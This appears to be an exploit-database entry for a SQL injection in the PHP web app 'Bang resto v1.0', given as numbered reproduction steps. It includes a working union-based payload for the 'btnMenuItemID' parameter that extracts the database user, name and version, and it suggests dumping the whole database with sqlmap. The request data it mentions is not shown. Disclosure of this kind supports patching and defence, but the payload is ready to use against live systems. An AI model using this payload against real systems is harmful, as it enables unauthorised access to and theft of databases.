Bang resto v1.0 multiple sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Bang resto v1.0 multiple sql injection is for educational purposes only and if it is used you will do on your own risk!
*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:
3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.
5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite